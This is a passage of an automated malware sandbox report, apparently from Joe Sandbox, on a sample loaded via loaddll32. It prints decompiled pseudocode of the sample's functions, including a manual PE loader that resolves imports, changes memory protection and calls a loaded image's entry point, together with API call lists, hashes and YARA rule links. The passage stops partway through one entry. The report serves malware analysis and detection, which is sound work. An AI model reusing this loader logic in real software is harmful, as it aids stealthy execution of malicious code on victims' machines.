                                                                                                                                                                                                                                    			E02F954BC(void* __ecx) {
				signed int _v8;
				void* _t15;
				void* _t19;
				void* _t20;
				void* _t22;
				intOrPtr* _t23;

				_t23 = __imp__;
				_t20 = 0;
				_v8 = _v8 & 0;
				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
				_t10 = _v8;
				if(_v8 != 0) {
					_t20 = E02F92049(_t10 + 1);
					if(_t20 != 0) {
						_t15 =  *_t23(3, _t20,  &_v8); // executed
						if(_t15 != 0) {
							 *((char*)(_v8 + _t20)) = 0;
						} else {
							E02F99039(_t20);
							_t20 = 0;
						}
					}
				}
				return _t20;
			}









                                                                                                                                                                                                                                    0x02f954c1
                                                                                                                                                                                                                                    0x02f954cc
                                                                                                                                                                                                                                    0x02f954ce
                                                                                                                                                                                                                                    0x02f954d4
                                                                                                                                                                                                                                    0x02f954d6
                                                                                                                                                                                                                                    0x02f954db
                                                                                                                                                                                                                                    0x02f954e4
                                                                                                                                                                                                                                    0x02f954e8
                                                                                                                                                                                                                                    0x02f954f1
                                                                                                                                                                                                                                    0x02f954f5
                                                                                                                                                                                                                                    0x02f95504
                                                                                                                                                                                                                                    0x02f954f7
                                                                                                                                                                                                                                    0x02f954f8
                                                                                                                                                                                                                                    0x02f954fd
                                                                                                                                                                                                                                    0x02f954fd
                                                                                                                                                                                                                                    0x02f954f5
                                                                                                                                                                                                                                    0x02f954e8
                                                                                                                                                                                                                                    0x02f9550d

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetComputerNameExA.KERNELBASE(00000003,00000000,02F9A306,76D7F710,00000000,?,?,02F9A306), ref: 02F954D4
                                                                                                                                                                                                                                      • Part of subcall function 02F92049: RtlAllocateHeap.NTDLL(00000000,00000000,02F97E50), ref: 02F92055
                                                                                                                                                                                                                                    • GetComputerNameExA.KERNELBASE(00000003,00000000,02F9A306,02F9A307,?,?,02F9A306), ref: 02F954F1
                                                                                                                                                                                                                                      • Part of subcall function 02F99039: HeapFree.KERNEL32(00000000,00000000,02F97F18,00000000,?,?,00000000), ref: 02F99045
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ComputerHeapName$AllocateFree
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 187446995-0
                                                                                                                                                                                                                                    • Opcode ID: f263cf12439c1fdb39b0745f4aea7aaad9e6280f739de30d994f7d5471a14312
                                                                                                                                                                                                                                    • Instruction ID: 981320daf0963b8bf439fb18e8d76caf5e946a92c59a5b3f37367eeca2b25463
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f263cf12439c1fdb39b0745f4aea7aaad9e6280f739de30d994f7d5471a14312
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 86F05436A00109BBFF11D6AA9C01EAF76AEDBC5A94F510069AA04D3241EA70DE058B70
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 02F98055, Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			_entry_(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t4;
				void* _t10;
				void* _t11;
				void* _t12;
				void* _t14;

				_t14 = 1;
				_t4 = _a8;
				if(_t4 == 0) {
					if(InterlockedDecrement(0x2f9d23c) == 0) {
						E02F9970F();
					}
				} else {
					if(_t4 == 1 && InterlockedIncrement(0x2f9d23c) == 1) {
						_t10 = E02F96A56(_t11, _t12, _a4); // executed
						if(_t10 != 0) {
							_t14 = 0;
						}
					}
				}
				return _t14;
			}








                                                                                                                                                                                                                                    0x02f9805c
                                                                                                                                                                                                                                    0x02f9805d
                                                                                                                                                                                                                                    0x02f98060
                                                                                                                                                                                                                                    0x02f98092
                                                                                                                                                                                                                                    0x02f98094
                                                                                                                                                                                                                                    0x02f98094
                                                                                                                                                                                                                                    0x02f98062
                                                                                                                                                                                                                                    0x02f98063
                                                                                                                                                                                                                                    0x02f98078
                                                                                                                                                                                                                                    0x02f9807f
                                                                                                                                                                                                                                    0x02f98081
                                                                                                                                                                                                                                    0x02f98081
                                                                                                                                                                                                                                    0x02f9807f
                                                                                                                                                                                                                                    0x02f98063
                                                                                                                                                                                                                                    0x02f9809c

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • InterlockedIncrement.KERNEL32(02F9D23C), ref: 02F9806A
                                                                                                                                                                                                                                      • Part of subcall function 02F96A56: HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,02F9807D,?), ref: 02F96A69
                                                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(02F9D23C), ref: 02F9808A
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Interlocked$CreateDecrementHeapIncrement
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3834848776-0
                                                                                                                                                                                                                                    • Opcode ID: 329ab4024eaea948216575358483ba9b3715df4e5242042d2abab0828277292d
                                                                                                                                                                                                                                    • Instruction ID: 14812f5c8ec6e42eaafda05859f160df8a2602f130275672d6553b505d331765
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 329ab4024eaea948216575358483ba9b3715df4e5242042d2abab0828277292d
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E3E04F75A4426557BE316B74DC04B5EF755AB02FC4F054A14F785D4174C752C4908AD1
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 02F99318, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 34%
                                                                                                                                                                                                                                    			E02F99318(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v12;
				void* _v18;
				short _v20;
				intOrPtr _t15;
				short _t17;
				intOrPtr _t19;
				short _t23;

				_t23 = 0;
				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t15 =  *0x2f9d27c; // 0x44a5a8
				_t4 = _t15 + 0x2f9e39c; // 0x33e8944
				_t20 = _t4;
				_t6 = _t15 + 0x2f9e124; // 0x650047
				_t17 = E02F99152(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
				if(_t17 < 0) {
					_t23 = _t17;
				} else {
					if(_v20 != 8) {
						_t23 = 1;
					} else {
						_t19 = E02F99FC9(_t20, _v12);
						if(_t19 == 0) {
							_t23 = 8;
						} else {
							 *_a16 = _t19;
						}
						__imp__#6(_v12);
					}
				}
				return _t23;
			}










                                                                                                                                                                                                                                    0x02f99322
                                                                                                                                                                                                                                    0x02f99324
                                                                                                                                                                                                                                    0x02f9932b
                                                                                                                                                                                                                                    0x02f9932c
                                                                                                                                                                                                                                    0x02f9932d
                                                                                                                                                                                                                                    0x02f9932e
                                                                                                                                                                                                                                    0x02f99334
                                                                                                                                                                                                                                    0x02f99339
                                                                                                                                                                                                                                    0x02f99339
                                                                                                                                                                                                                                    0x02f99343
                                                                                                                                                                                                                                    0x02f99355
                                                                                                                                                                                                                                    0x02f9935c
                                                                                                                                                                                                                                    0x02f9938b
                                                                                                                                                                                                                                    0x02f9935e
                                                                                                                                                                                                                                    0x02f99363
                                                                                                                                                                                                                                    0x02f99388
                                                                                                                                                                                                                                    0x02f99365
                                                                                                                                                                                                                                    0x02f99368
                                                                                                                                                                                                                                    0x02f9936f
                                                                                                                                                                                                                                    0x02f9937a
                                                                                                                                                                                                                                    0x02f99371
                                                                                                                                                                                                                                    0x02f99374
                                                                                                                                                                                                                                    0x02f99374
                                                                                                                                                                                                                                    0x02f9937e
                                                                                                                                                                                                                                    0x02f9937e
                                                                                                                                                                                                                                    0x02f99363
                                                                                                                                                                                                                                    0x02f99392

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 02F99152: SysFreeString.OLEAUT32(?), ref: 02F99231
                                                                                                                                                                                                                                      • Part of subcall function 02F99FC9: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,02F97946,004F0053,00000000,?), ref: 02F99FD2
                                                                                                                                                                                                                                      • Part of subcall function 02F99FC9: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,02F97946,004F0053,00000000,?), ref: 02F99FFC
                                                                                                                                                                                                                                      • Part of subcall function 02F99FC9: memset.NTDLL ref: 02F9A010
                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 02F9937E
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: FreeString$lstrlenmemcpymemset
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 397948122-0
                                                                                                                                                                                                                                    • Opcode ID: 8b1bd5712305eab52b7e68243b0af9633cb857934010a6678e60df1ecfa488ab
                                                                                                                                                                                                                                    • Instruction ID: d1d56bf8bcbd34cee49845b8df4782cbb6e7b4ea181d1b78dd6ae2fc786e440d
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8b1bd5712305eab52b7e68243b0af9633cb857934010a6678e60df1ecfa488ab
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8E01D432900019BFEF119FA8CC04DAEBBBDFB48784F024929EA11E31A0D3B19954CBD1
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00401FE7, Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 37%
                                                                                                                                                                                                                                    			E00401FE7(void* __eax, intOrPtr _a4) {

				 *0x404148 =  *0x404148 & 0x00000000;
				_push(0);
				_push(0x404144);
				_push(1);
				_push(_a4);
				 *0x404140 = 0xc; // executed
				L00401BD6(); // executed
				return __eax;
			}



                                                                                                                                                                                                                                    0x00401fe7
                                                                                                                                                                                                                                    0x00401fee
                                                                                                                                                                                                                                    0x00401ff0
                                                                                                                                                                                                                                    0x00401ff5
                                                                                                                                                                                                                                    0x00401ff7
                                                                                                                                                                                                                                    0x00401ffb
                                                                                                                                                                                                                                    0x00402005
                                                                                                                                                                                                                                    0x0040200a

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(00401387,00000001,00404144,00000000), ref: 00402005
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.512650162.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.512935351.0000000000405000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_loaddll32.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: DescriptorSecurity$ConvertString
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3907675253-0
                                                                                                                                                                                                                                    • Opcode ID: 9b2c487b67a07d99fdd9699fa098756d513cf92635e2e3c07589c75f82ff200c
                                                                                                                                                                                                                                    • Instruction ID: 64a343feecbe3ef0b73f5dc68f4200e7203235e6a0c8b6df44520468a7cd6f76
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9b2c487b67a07d99fdd9699fa098756d513cf92635e2e3c07589c75f82ff200c
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C0C04CF4140300A7E6209F019D4AF05766177E4709F204529F3003A1E093F91094851D
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 02F92049, Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E02F92049(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0x2f9d238, 0, _a4); // executed
				return _t2;
			}




                                                                                                                                                                                                                                    0x02f92055
                                                                                                                                                                                                                                    0x02f9205b

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,00000000,02F97E50), ref: 02F92055
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                                                                                                                    • Opcode ID: 5468bf9a7f5bc09c9303cd972960506b6578b56e856f946461114634b27c2073
                                                                                                                                                                                                                                    • Instruction ID: e1a2be2bb2d43527d9685a1eb281740708a3f2363a71e46c2179db9f042f98bd
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5468bf9a7f5bc09c9303cd972960506b6578b56e856f946461114634b27c2073
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 10B01236C80104ABCA015B00DD05F05FF21AB58F40F104911B20484070C3314470EB05
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00401E11, Relevance: 1.3, APIs: 1, Instructions: 70COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 86%
                                                                                                                                                                                                                                    			E00401E11(void* __eax) {
				char _v8;
				void* _v12;
				void* __edi;
				void* _t18;
				long _t24;
				long _t26;
				long _t29;
				intOrPtr _t40;
				void* _t41;
				intOrPtr* _t42;
				void* _t44;

				_t41 = __eax;
				_t16 =  *0x40414c;
				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x40414c - 0x63698bc4 &  !( *0x40414c - 0x63698bc4);
				_t18 = E00401A0F( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x40414c - 0x63698bc4 &  !( *0x40414c - 0x63698bc4),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x40414c - 0x63698bc4 &  !( *0x40414c - 0x63698bc4), _t16 + 0x9c96647d,  &_v8,  &_v12); // executed
				if(_t18 != 0) {
					_t29 = 8;
					goto L8;
				} else {
					_t40 = _v8;
					_t29 = E0040125B(_t33, _t40, _t41);
					if(_t29 == 0) {
						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;
						_t24 = E00401745(_t40, _t44); // executed
						_t29 = _t24;
						if(_t29 == 0) {
							_t26 = E00401179(_t44, _t40); // executed
							_t29 = _t26;
							if(_t29 == 0) {
								_push(_t26);
								_push(1);
								_push(_t40);
								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
									_t29 = GetLastError();
								}
							}
						}
					}
					_t42 = _v12;
					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
					E00401DFC(_t42);
					L8:
					return _t29;
				}
			}














                                                                                                                                                                                                                                    0x00401e19
                                                                                                                                                                                                                                    0x00401e1b
                                                                                                                                                                                                                                    0x00401e37
                                                                                                                                                                                                                                    0x00401e48
                                                                                                                                                                                                                                    0x00401e4f
                                                                                                                                                                                                                                    0x00401ead
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00401e51
                                                                                                                                                                                                                                    0x00401e51
                                                                                                                                                                                                                                    0x00401e5b
                                                                                                                                                                                                                                    0x00401e5f
                                                                                                                                                                                                                                    0x00401e64
                                                                                                                                                                                                                                    0x00401e67
                                                                                                                                                                                                                                    0x00401e6c
                                                                                                                                                                                                                                    0x00401e70
                                                                                                                                                                                                                                    0x00401e75
                                                                                                                                                                                                                                    0x00401e7a
                                                                                                                                                                                                                                    0x00401e7e
                                                                                                                                                                                                                                    0x00401e83
                                                                                                                                                                                                                                    0x00401e84
                                                                                                                                                                                                                                    0x00401e88
                                                                                                                                                                                                                                    0x00401e8d
                                                                                                                                                                                                                                    0x00401e95
                                                                                                                                                                                                                                    0x00401e95
                                                                                                                                                                                                                                    0x00401e8d
                                                                                                                                                                                                                                    0x00401e7e
                                                                                                                                                                                                                                    0x00401e70
                                                                                                                                                                                                                                    0x00401e97
                                                                                                                                                                                                                                    0x00401ea0
                                                                                                                                                                                                                                    0x00401ea4
                                                                                                                                                                                                                                    0x00401eae
                                                                                                                                                                                                                                    0x00401eb4
                                                                                                                                                                                                                                    0x00401eb4

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 00401A0F: GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,00401E4D,?,?,?,?,?,00000002,?,00401401), ref: 00401A33
                                                                                                                                                                                                                                      • Part of subcall function 00401A0F: GetProcAddress.KERNEL32(00000000,?), ref: 00401A55
                                                                                                                                                                                                                                      • Part of subcall function 00401A0F: GetProcAddress.KERNEL32(00000000,?), ref: 00401A6B
                                                                                                                                                                                                                                      • Part of subcall function 00401A0F: GetProcAddress.KERNEL32(00000000,?), ref: 00401A81
                                                                                                                                                                                                                                      • Part of subcall function 00401A0F: GetProcAddress.KERNEL32(00000000,?), ref: 00401A97
                                                                                                                                                                                                                                      • Part of subcall function 00401A0F: GetProcAddress.KERNEL32(00000000,?), ref: 00401AAD
                                                                                                                                                                                                                                      • Part of subcall function 0040125B: memcpy.NTDLL(?,?,?), ref: 00401288
                                                                                                                                                                                                                                      • Part of subcall function 0040125B: memcpy.NTDLL(?,?,?), ref: 004012BB
                                                                                                                                                                                                                                      • Part of subcall function 00401745: LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 0040177D
                                                                                                                                                                                                                                      • Part of subcall function 00401179: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 004011B2
                                                                                                                                                                                                                                      • Part of subcall function 00401179: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 00401227
                                                                                                                                                                                                                                      • Part of subcall function 00401179: GetLastError.KERNEL32 ref: 0040122D
                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00401401), ref: 00401E8F
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.512650162.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.512935351.0000000000405000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_loaddll32.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AddressProc$ErrorLastProtectVirtualmemcpy$HandleLibraryLoadModule
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2673762927-0
                                                                                                                                                                                                                                    • Opcode ID: ac1c15eea1d471ab0512bfeefaa7e6246061eff03e495dd0c18f64ef0ca3e3c7
                                                                                                                                                                                                                                    • Instruction ID: 7a28e5235208ce399f98616bf791f331da11f6e25b936d66cc8c9f92ca0095d4
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ac1c15eea1d471ab0512bfeefaa7e6246061eff03e495dd0c18f64ef0ca3e3c7
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3111CB76600705ABD721ABA5CC80DAF77BCAF89318704417AED01B76A1E7B4ED0687E4
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 02F921CD, Relevance: 1.3, APIs: 1, Instructions: 57memoryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 70%
                                                                                                                                                                                                                                    			E02F921CD(void* __ecx, signed char* _a4) {
				void* _v8;
				void* _t8;
				signed short _t11;
				signed int _t12;
				signed int _t14;
				intOrPtr _t15;
				void* _t19;
				signed short* _t22;
				void* _t24;
				intOrPtr* _t27;

				_t24 = 0;
				_push(0);
				_t19 = 1;
				_t27 = 0x2f9d330;
				E02F984D5();
				while(1) {
					_t8 = E02F912D4(_a4,  &_v8); // executed
					if(_t8 == 0) {
						break;
					}
					_push(_v8);
					_t14 = 0xd;
					_t15 = E02F9809F(_t14);
					if(_t15 == 0) {
						HeapFree( *0x2f9d238, 0, _v8);
						break;
					} else {
						 *_t27 = _t15;
						_t27 = _t27 + 4;
						_t24 = _t24 + 1;
						if(_t24 < 3) {
							continue;
						} else {
						}
					}
					L7:
					_push(1);
					E02F984D5();
					if(_t19 != 0) {
						_t22 =  *0x2f9d338; // 0x33e9b70
						_t11 =  *_t22 & 0x0000ffff;
						if(_t11 < 0x61 || _t11 > 0x7a) {
							_t12 = _t11 & 0x0000ffff;
						} else {
							_t12 = (_t11 & 0x0000ffff) - 0x20;
						}
						 *_t22 = _t12;
					}
					return _t19;
				}
				_t19 = 0;
				goto L7;
			}













                                                                                                                                                                                                                                    0x02f921d5
                                                                                                                                                                                                                                    0x02f921d9
                                                                                                                                                                                                                                    0x02f921da
                                                                                                                                                                                                                                    0x02f921db
                                                                                                                                                                                                                                    0x02f921e0
                                                                                                                                                                                                                                    0x02f921e5
                                                                                                                                                                                                                                    0x02f921ec
                                                                                                                                                                                                                                    0x02f921f3
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f921f5
                                                                                                                                                                                                                                    0x02f921fa
                                                                                                                                                                                                                                    0x02f921fb
                                                                                                                                                                                                                                    0x02f92202
                                                                                                                                                                                                                                    0x02f9221c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f92204
                                                                                                                                                                                                                                    0x02f92204
                                                                                                                                                                                                                                    0x02f92206
                                                                                                                                                                                                                                    0x02f92209
                                                                                                                                                                                                                                    0x02f9220d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f9220f
                                                                                                                                                                                                                                    0x02f9220d
                                                                                                                                                                                                                                    0x02f92224
                                                                                                                                                                                                                                    0x02f92224
                                                                                                                                                                                                                                    0x02f92226
                                                                                                                                                                                                                                    0x02f9222d
                                                                                                                                                                                                                                    0x02f9222f
                                                                                                                                                                                                                                    0x02f92235
                                                                                                                                                                                                                                    0x02f9223c
                                                                                                                                                                                                                                    0x02f9224c
                                                                                                                                                                                                                                    0x02f92244
                                                                                                                                                                                                                                    0x02f92247
                                                                                                                                                                                                                                    0x02f92247
                                                                                                                                                                                                                                    0x02f9224f
                                                                                                                                                                                                                                    0x02f9224f
                                                                                                                                                                                                                                    0x02f92258
                                                                                                                                                                                                                                    0x02f92258
                                                                                                                                                                                                                                    0x02f92222
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 02F984D5: GetProcAddress.KERNEL32(36776F57,02F921E5), ref: 02F984F0
                                                                                                                                                                                                                                      • Part of subcall function 02F912D4: RtlAllocateHeap.NTDLL(00000000,63699BC3,00000000), ref: 02F912FF
                                                                                                                                                                                                                                      • Part of subcall function 02F912D4: RtlAllocateHeap.NTDLL(00000000,63699BC3), ref: 02F91321
                                                                                                                                                                                                                                      • Part of subcall function 02F912D4: memset.NTDLL ref: 02F9133B
                                                                                                                                                                                                                                      • Part of subcall function 02F912D4: CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 02F91379
                                                                                                                                                                                                                                      • Part of subcall function 02F912D4: GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 02F9138D
                                                                                                                                                                                                                                      • Part of subcall function 02F912D4: FindCloseChangeNotification.KERNELBASE(00000000), ref: 02F913A4
                                                                                                                                                                                                                                      • Part of subcall function 02F912D4: StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 02F913B0
                                                                                                                                                                                                                                      • Part of subcall function 02F912D4: lstrcat.KERNEL32(?,642E2A5C), ref: 02F913F1
                                                                                                                                                                                                                                      • Part of subcall function 02F912D4: FindFirstFileA.KERNELBASE(?,?), ref: 02F91407
                                                                                                                                                                                                                                      • Part of subcall function 02F9809F: lstrlen.KERNEL32(?,00000000,02F9D330,00000001,02F92200,02F9D00C,02F9D00C,00000000,00000005,00000000,00000000,?,?,?,02F996C1,02F923E9), ref: 02F980A8
                                                                                                                                                                                                                                      • Part of subcall function 02F9809F: mbstowcs.NTDLL ref: 02F980CF
                                                                                                                                                                                                                                      • Part of subcall function 02F9809F: memset.NTDLL ref: 02F980E1
                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,02F9D00C,02F9D00C,02F9D00C,00000000,00000005,00000000,00000000,?,?,?,02F996C1,02F923E9,02F9D00C,?,02F923E9), ref: 02F9221C
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: FileHeap$AllocateFindmemset$AddressChangeCloseCreateFirstFreeNotificationProcTimelstrcatlstrlenmbstowcs
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 983081259-0
                                                                                                                                                                                                                                    • Opcode ID: eb1d807357836c940b2a12cf31a712e6183425ef4ba7188cf3410d4df421dadf
                                                                                                                                                                                                                                    • Instruction ID: 81aa2435b0713757c65f5cda8b607e478a9f1a40b5e640fc35469af42d5d49b3
